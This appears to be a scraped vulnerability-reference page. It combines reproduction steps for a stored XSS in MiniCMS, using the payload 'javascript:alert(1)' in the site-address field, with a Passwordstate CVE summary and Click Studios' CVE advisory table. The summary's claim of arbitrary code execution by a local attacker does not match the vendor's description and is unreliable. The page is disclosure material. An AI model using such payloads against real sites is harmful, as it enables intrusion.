1.Environment download address: https://codeload.github.com/bg5sbk/MiniCMS/zip/refs/tags/v1.11

2.Log in to the background page to go to the following URL

 /mc-admin/conf.php 

3.At the site address, enter: javascript:alert(1)

4.xss is triggered by clicking on my website at /mc-admin/head.php

CVE-2023-46378: Minicms1.1.1 Exists storage xss

Cross Site Request Forgery vulnerability in Click Studios (SA) Pty Ltd Passwordstate v.Build 9785 and before allows a local attacker to execute arbitrary code via a crafted request.

Incident Management Advisories

**Major Incidents**

**Click Studios has an established Incident Management Plan that is used in the event of major incidents affecting Passwordstate’s operation.**

As part of the Incident Management Process, Click Studios will email all customers advising to check this advisories page for updates. Advisories detail the best known information available, at a point in time, and are the only authorized updates for existing and potential customers, media and interested parties. By publishing these advisories, representing the single source of truth, Technical Support Team members, developers and Pre-Sales staff can focus solely on assisting customers with the major incident.

Please be aware that emails to Sales or Support, requesting additional information, will be replied to with a standard response directing the requestor to this Advisories page. Please understand, if Click Studios invokes the Incident Management Plan, our number one priority is working with our customers to identify if they have been affected and advising them of required remedial actions.

We recommend any interested party periodically check this advisories page for the latest updates.

**Advisories:**

There are no current major incidents at this time.

**Common Vulnerabilities and Exposures:**

The table below provides a list of Click Studios confirmed information-security vulnerabilities and exposures for Passwordstate or associated modules. Interested parties can subscribe to this list to be notified when new CVEs are added.

**_Date_**

*   2023-09-25
*   2023-08-31
*   2022-11-07
*   2022-09-05
*   2022-09-05
*   2020-10-29
*   2020-10-05
*   2018-08-01

**_CVE(s)_**

*   CVE Pending
*   CVE-2023-43295
*   CVE-2022-3877
*   CVE-2022-3875
*   CVE-2022-3876
*   CVE-2020-27747
*   CVE-2020-26061
*   CVE-2018-14776

**_Severity_**

*   Low
*   Low
*   Medium
*   High
*   Medium
*   Low
*   High
*   Low

**_Product_**

*   Passwordstate API
*   Passwordstate Core
*   Passwordstate Core
*   Passwordstate API
*   Passwordstate API
*   Mobile Web Site (Deprecated)
*   Password Reset Portal
*   Passwordstate Core

**_Description_**

*   Incorrect Access Control allowing the potential for an existing Security Administrator to use the System Wide API Key to interact with private password lists for Password History, delete and copy/move API endpoints.
*   Fixed a potential Cross-Site Request Forgery (CSRF) failure, for authenticated sessions, which allowed remote attackers who are able to trick a user into retrying a request to bypass CSRF protection and replay a carefully crafted request.
*   Cross site scripting vulnerability for URL field
*   Authentication bypass by assumed-immutable data
*   Manipulation of the argument PasswordID leads to authorization bypass
*   Lack of brute force attack detection on PIN code authentication
*   A well crafted HTTP request allowed setting a password for a registered user
*   XSS by authenticated users via an uploaded HTML document

**_Fixed_**

*   Build 9811
*   Build 9795
*   Build 9653
*   Build 9611
*   Build 9611
*   Build 8987
*   Build 8501
*   Build 8397

**Subscribe to our Annoucements/Advisories RSS Feed

Subscribe to our RSS Feed for the latest announcements and security advisories.

Simply add the URL of https://forums.clickstudios.com.au/forum/6-announcements.xml to your favorite RSS Reader.

  

**

Tag

#web